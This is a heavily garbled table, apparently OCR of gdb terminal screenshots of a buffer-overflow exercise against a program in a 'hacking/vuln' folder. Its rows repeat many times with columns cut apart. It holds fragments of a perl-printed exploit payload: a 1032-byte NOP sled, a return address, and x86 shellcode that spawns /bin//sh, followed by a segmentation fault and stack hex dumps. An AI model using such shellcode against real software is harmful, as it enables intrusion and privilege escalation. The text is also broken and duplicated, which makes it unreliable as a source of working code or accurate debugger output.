| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/3000;<br>od0:<br>od0:<br>od8:<br>oc0:<br>oc8:<br>oc6:<br>oc6:                                                                                                    | ived sig<br>nore/ka<br>da\xea<br>68\x68<br>ived sig<br>n ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0xe1                                                                                                    | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31                                                                 | (y or r<br>/Deskto<br>\x31\xc<br>2\x69\<br>GSEGV,<br>0xea<br>0x31<br>0x2f<br>0x6e<br>0xc0                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\><br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b                                                                                                    | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd                                                                                                    | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80                                                                                                 | ot<br>2\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x<br>9090 i<br>/3000:<br>od0:<br>od8:<br>oe0:<br>oe8:<br>of0:<br>of8:                                                                                                    | ived sign<br>ived sign<br>ived sign<br>in ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0xe1<br>0x58                                                                                                    | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>Jnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c                                                         | <ul> <li>' (y or r</li> <li>'/Deskto</li> <li>\x31\xc</li> <li>52\x69\</li> <li>GSEGV,</li> <li>0xea</li> <li>0x31</li> <li>0x2f</li> <li>0x6e</li> <li>0xc0</li> <li>0xff</li> </ul>                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\><br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90                                                                                                    | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3                                                                                                    | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7                                                                                         | nt<br>2\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Progran<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x<br>9090 i<br>/3000:<br>od0:<br>od8:<br>oe0:<br>oe8:<br>of0:<br>of8:<br>c00:                                                                                                    | ived sig<br>(ived sig<br>(in ?? ())<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x51<br>0x62<br>0xe1<br>0x58<br>0x02                                                                                                    | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>Jnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00                                                 | (y or r<br>/Deskto<br>x31\xc<br>2\x69\<br>GSEGV,<br>0xea<br>0x31<br>0x2f<br>0x6e<br>0xc0<br>0xff<br>0x00                                                                                                    | p/hack<br>0\x31\<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\x<br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84                                                                                                    | n `perl<br>1\xc9\x<br>51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c                                                                                                    | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff                                                                                 | nt<br>\\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Progran<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/3000:<br>od0:<br>od0:<br>od8:<br>oe0:<br>oe8:<br>of0:<br>of8:<br>c00:<br>c08:                                                                                                    | ived sig<br>(ived sig<br>(in ?? ())<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0xe1<br>0x58<br>0x02<br>0x90                                                                                                    | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>Jnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c                                         | <ul> <li>'(y or r</li> <li>'Deskto</li> <li>\x31\xc</li> <li>\x69\</li> <li>GSEGV,</li> <li>0xea</li> <li>0x31</li> <li>0x2f</li> <li>0x6e</li> <li>0xc0</li> <li>0xff</li> <li>0x00</li> <li>0xff</li> </ul>                                                                                                    | <ul> <li>p/hack</li> <li>p/hack</li> <li>0\x31\;</li> <li>x6e\x8'</li> <li>Segme</li> <li>0xbf</li> <li>0xd2</li> <li>0x2f</li> <li>0x89</li> <li>0xb0</li> <li>0xbf</li> <li>0x00</li> <li>0xbf</li> <li>0x00</li> <li>0xbf</li> </ul>                                              | ing/vuli<br>xdb\x3<br>9\xe3\x<br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0xd0                                                                                                    | n `perl<br>1\xc9\x<br>51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52                                                                                                    | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b                                                                         | ot<br>\\xb0\x46\xcd\x80\x5<br>e1\x31\xc0\xb0\x0b\<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Progran<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/30002<br>od0:<br>od8:<br>oc02<br>of8:<br>co63:<br>co63:<br>co | ived sig<br>(n ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62                                                                                                    | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00                                 | <ul> <li>'(y or r</li> <li>'Deskto</li> <li>'X31\xc</li> <li>'Z\x69\</li> <li>'Z\x69\</li> <li'z\x69\< li=""> <li'z\x69\< li="">     &lt;</li'z\x69\<></li'z\x69\<></ul>                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\x<br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0xd0<br>0x01                                                                                                    | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00                                                                                                    | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x00                                                                 | 0xdb<br>0xdb<br>0x2f<br>0x00<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Progran<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/30002<br>od0:<br>od8:<br>od8:<br>of0:<br>of8:<br>c00:<br>c08:<br>c00:<br>c08:<br>c10:<br>c18:                                                                                                    | ived sig<br>ived sig<br>ived sig<br>n ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62                                                                                                 | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x00         | <ul> <li>'(y or r</li> <li>'Deskto</li> <li>'X31\xc</li> <li>'2\x69\</li> <li>GSEGV,</li> <li>Oxea</li> <li>0x31</li> <li>0x2f</li> <li>0x6e</li> <li>0xc0</li> <li>0xff</li> <li>0x00</li> <li>0xff</li> <li>0x00</li> <li>0xff</li> <li>0x00</li> <li>0xf0</li> <li>0xf0</li> <li>0x00</li> <li>0x00</li> <li>0x00</li> <li>0x00</li> <li>0x00</li> <li>0x00</li> <li>0x00</li> <li>0x00</li> </ul>                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0x00                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\x<br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0xd0<br>0x01<br>0x09                                                                                                    | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00<br>0x82                                                                                                | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x00<br>0x04                                                         | 0xdb<br>0xdb<br>0x2f<br>0xb7<br>0xb7<br>0xb7<br>0xb7<br>0xb8<br>0x00<br>0xb7<br>0xb8<br>0x00<br>0xb7<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb8                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/3000;<br>od0:<br>od8:<br>oc0:<br>cof8:<br>cof0:<br>cof8:<br>co0:<br>cof8:<br>co0:<br>co0:<br>co1:<br>co0:<br>co1:<br>co1:<br>co1:<br>co1:<br>co1:<br>co1:<br>co1:<br>co1                                                                                                    | ived sig<br>ived sig<br>ived sig<br>in ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0xe1<br>0x58<br>0x02<br>0x90<br>0x00<br>0x00<br>0x00<br>0x64                                                                                        | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00 | <ul> <li>'(y or r</li> <li>'Deskto</li> <li>'X31\xc</li> <li>'2\x69\</li> <li>'32\x69\</li> <li>'32\x69\<td>p/hack<br/>0\x31\;<br/>x6e\x8<br/>Segme<br/>0xbf<br/>0xd2<br/>0x2f<br/>0x89<br/>0xb0<br/>0xbf<br/>0x00<br/>0xbf<br/>0x00<br/>0xbf<br/>0x00<br/>0xbf<br/>0x00<br/>0xb8</td><td>ing/vuli<br/>xdb\x3<br/>9\xe3\&gt;<br/>entation<br/>0x31<br/>0xb0<br/>0x73<br/>0xe3<br/>0x0b<br/>0x90<br/>0x84<br/>0xd0<br/>0x01<br/>0x09<br/>0x09<br/>0x09<br/>0x01</td><td>n `perl<br/>1\xc9\x<br/>(51\x53<br/>fault.<br/>0xc0<br/>0x46<br/>0x68<br/>0x51<br/>0xcd<br/>0xf3<br/>0x1c<br/>0x52<br/>0x00<br/>0x82<br/>0x3c</td><td>-e 'prin<br/>31\xd2<br/>3\x89\x<br/>0x31<br/>0xcd<br/>0x68<br/>0x53<br/>0x80<br/>0xf7<br/>0xff<br/>0x0b<br/>0x00<br/>0x04<br/>0x0f</td><td>0xdb<br/>0xdb<br/>0x80<br/>0x2f<br/>0x89<br/>0x00<br/>0xb7<br/>0xbf<br/>0xb8<br/>0x00<br/>0xb8<br/>0x00<br/>0xb7</td></li></ul>                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xb8                                                                                                    | ing/vuli<br>xdb\x3<br>9\xe3\><br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0xd0<br>0x01<br>0x09<br>0x09<br>0x09<br>0x01                                                                                  | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00<br>0x82<br>0x3c                                                                                        | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x00<br>0x04<br>0x0f                                                 | 0xdb<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb7                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Prograr<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/3000;<br>od0:<br>od8:<br>od8:<br>oc0:<br>co8:<br>co6:<br>co8:<br>co8:<br>co8:<br>co8:<br>co8:<br>co8:<br>co8:<br>co8                                                                                                    | ived sign<br>(ived sign<br>(ived sign<br>(in ?? ())<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x52<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x6                                                                                  | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>Jnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x00<br>0x0  | <ul> <li>'(y or r</li> <li>'Deskto</li> <li>\x31\xc</li> <li>\x69\</li> <li>GSEGV,</li> <li>0xea</li> <li>0x31</li> <li>0x2f</li> <li>0x6e</li> <li>0xc0</li> <li>0xff</li> <li>0x00</li> <li>0xff</li> <li>0x00</li> <li>0x00</li> </ul>                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf                                                                                                    | ing/vuli<br>xdb\x33<br>9\xe3\><br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0xd0<br>0x01<br>0x09<br>0xe0<br>0x58                                                                                         | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00<br>0x82<br>0x3c<br>0x1c                                                                                | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x00<br>0x04<br>0x0f<br>0xff                                         | 0xdb<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xb5<br>0xb8<br>0x00<br>0x08<br>0x00                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Progran<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbff11<br>0xbff11<br>0xbff11                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>9090 i<br>/3000;<br>od0:<br>od8:<br>od8:<br>oc0:<br>oc8:<br>c00:<br>c08:<br>c10:<br>c18:<br>c10:<br>c18:<br>c20:<br>c28:<br>c30.                                                                                                    | ived signature<br>ived signature<br>ived signature<br>ived signature<br>ived signature<br>in ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0x91<br>0x58<br>0x02<br>0x90<br>0x00<br>0x00<br>0x00<br>0x00<br>0x64<br>0x00<br>0x81          | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x00<br>0x0              | <ul> <li>'(y or r</li> <li>'(Deskto</li> <li>\x31\xc</li> <li>\x69\</li> <li>GSEGV,</li> <li>0xea</li> <li>0x31</li> <li>0x2f</li> <li>0x6e</li> <li>0xc0</li> <li>0xff</li> <li>0x00</li> <li>0xff</li> <li>0x00</li> <li>0x00</li> <li>0x38</li> </ul>                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbg<br>0x00<br>0xbg<br>0x00<br>0xbg                                                                                 | ing/vuli<br>xdb\x33<br>9\xe3\><br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0xd0<br>0x01<br>0x09<br>0xe0<br>0x58<br>0x91                                                                                 | n `perl<br>1\xc9\x<br>(51\x53)<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00<br>0x82<br>0x3c<br>0x1c<br>0x3c<br>0x1c                                                               | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x00<br>0x04<br>0x0f<br>0xff<br>0x0f<br>0xff                         | 0xdb<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0x08<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00                                                                                                    |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Progran<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/30002<br>od0:<br>od8:<br>od8:<br>of0:<br>of8:<br>c00:<br>c10:<br>c18:<br>c20:<br>c18:<br>c20:<br>c28:<br>c30:<br>c38:                                                                                                    | ived sign<br>(ived sign<br>(ived sign<br>(ived sign<br>(in ?? ())<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0x90<br>0x00<br>0x00<br>0x00<br>0x00<br>0x00<br>0x00<br>0x0                                                                    | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x00<br>0x0              | <ul> <li>'(y or r</li> <li>'Deskto</li> <li>\x31\xc</li> <li>\x69\</li> <li>GSEGV,</li> <li>0xea</li> <li>0x31</li> <li>0x2f</li> <li>0x6e</li> <li>0xc0</li> <li>0xff</li> <li>0x00</li> <li>0x00</li> <li>0x0&lt;</li></ul>                                                                                                    | p/hack<br>0\x31\<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xea<br>0x00                                                                                          | ing/vuli<br>xdb\x3:<br>9\xe3\x<br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0x00<br>0x84<br>0x00<br>0x01<br>0x09<br>0xe0<br>0x58<br>0x91<br>0x00                                                         | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00<br>0x82<br>0x3c<br>0x1c<br>0x3c<br>0x1c<br>0x3c<br>0x1c                                                | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x00<br>0x04<br>0x0f<br>0xff<br>0x0f<br>0xff<br>0x0f<br>0xff         | oxdb<br>0xdb<br>0xdb<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x08<br>0x00<br>0x00<br>0x08<br>0x00<br>0x000<br>0x00<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x000<br>0x0000<br>0x000<br>0x000000 |
| Start it<br>Starting progra<br>"\x90"x1032,"<br>1\x68\x2f\x2f\<br>xcd\x80"'`<br>Progran<br>0x9090<br>(gdb) x<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbfff1<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11<br>0xbff11                                                                                                    | from t<br>am: /h<br>\x80\x<br>x73\x0<br>n recei<br>9090 i<br>/30002<br>od0:<br>od8:<br>od0:<br>od8:<br>of0:<br>of8:<br>c00:<br>c18:<br>c20:<br>c18:<br>c20:<br>c28:<br>c30:<br>c38:<br>c30:<br>c38:<br>c30:<br>c38:<br>c38:<br>c30:<br>c38:<br>c30:<br>c38:<br>c30:<br>c38:<br>c38:<br>c30:<br>c38:<br>c30:<br>c38:<br>c38:<br>c38:<br>c38:<br>c38:<br>c38:<br>c38:<br>c38                                                                                                    | ived sig<br>ived sig<br>n ?? ()<br>xb \$esp<br>0x80<br>0x31<br>0x51<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62<br>0x62                                                                                                    | Inning?<br>algecin/<br>\xbf","\<br>\x2f\x6<br>gnal SIC<br>0xda<br>0xc9<br>0x68<br>0x69<br>0x31<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x1c<br>0x00<br>0x00<br>0x0  | <ul> <li>'(y or r</li> <li>'Deskto</li> <li>'2\x69\</li> <li>'2\x69\</li> <li>GSEGV,</li> <li>Oxea</li> <li>0x31</li> <li>0x2f</li> <li>0x6e</li> <li>0xc0</li> <li>0xff</li> <li>0x00</li> <li>0x00<!--</td--><td>p/hack<br/>0\x31\;<br/>x6e\x8<br/>Segme<br/>0xbf<br/>0xd2<br/>0x2f<br/>0x89<br/>0xb0<br/>0xbf<br/>0x00<br/>0xbf<br/>0x00<br/>0xbf<br/>0x00<br/>0xb8<br/>0x00<br/>0xb8<br/>0x00<br/>0xea<br/>0x00<br/>0xea<br/>0x00</td><td>ing/vuli<br/>xdb\x3:<br/>9\xe3\x<br/>entation<br/>0x31<br/>0xb0<br/>0x73<br/>0xe3<br/>0x0b<br/>0x90<br/>0x84<br/>0x00<br/>0x84<br/>0x00<br/>0x01<br/>0x09<br/>0xe0<br/>0x58<br/>0x91<br/>0x00<br/>0x20</td><td>n `perl<br/>1\xc9\x<br/>(51\x53<br/>fault.<br/>0xc0<br/>0x46<br/>0x68<br/>0x51<br/>0xcd<br/>0xf3<br/>0x1c<br/>0x52<br/>0x00<br/>0x82<br/>0x3c<br/>0x1c<br/>0x3c<br/>0x1c<br/>0x3c<br/>0x1c<br/>0xaa<br/>0x00<br/>0xb7</td><td>-e 'prin<br/>31\xd2<br/>3\x89\x<br/>0x31<br/>0xcd<br/>0x68<br/>0x53<br/>0x80<br/>0xf7<br/>0xff<br/>0x0b<br/>0x00<br/>0x04<br/>0x0f<br/>0xff<br/>0x66<br/>0x00<br/>0x00</td><td>0xdb<br/>0xdb<br/>0x80<br/>0x2f<br/>0x89<br/>0x00<br/>0xb7<br/>0xbf<br/>0xb8<br/>0x00<br/>0x08<br/>0x00<br/>0xb8<br/>0x00<br/>0x08<br/>0x08</td></li></ul>                                                                                                    | p/hack<br>0\x31\;<br>x6e\x8<br>Segme<br>0xbf<br>0xd2<br>0x2f<br>0x89<br>0xb0<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xbf<br>0x00<br>0xb8<br>0x00<br>0xb8<br>0x00<br>0xea<br>0x00<br>0xea<br>0x00                                                                                         | ing/vuli<br>xdb\x3:<br>9\xe3\x<br>entation<br>0x31<br>0xb0<br>0x73<br>0xe3<br>0x0b<br>0x90<br>0x84<br>0x00<br>0x84<br>0x00<br>0x01<br>0x09<br>0xe0<br>0x58<br>0x91<br>0x00<br>0x20                                                 | n `perl<br>1\xc9\x<br>(51\x53<br>fault.<br>0xc0<br>0x46<br>0x68<br>0x51<br>0xcd<br>0xf3<br>0x1c<br>0x52<br>0x00<br>0x82<br>0x3c<br>0x1c<br>0x3c<br>0x1c<br>0x3c<br>0x1c<br>0xaa<br>0x00<br>0xb7                        | -e 'prin<br>31\xd2<br>3\x89\x<br>0x31<br>0xcd<br>0x68<br>0x53<br>0x80<br>0xf7<br>0xff<br>0x0b<br>0x00<br>0x04<br>0x0f<br>0xff<br>0x66<br>0x00<br>0x00                 | 0xdb<br>0xdb<br>0x80<br>0x2f<br>0x89<br>0x00<br>0xb7<br>0xbf<br>0xb8<br>0x00<br>0x08<br>0x00<br>0xb8<br>0x00<br>0x08<br>0x08                                                                                                    |
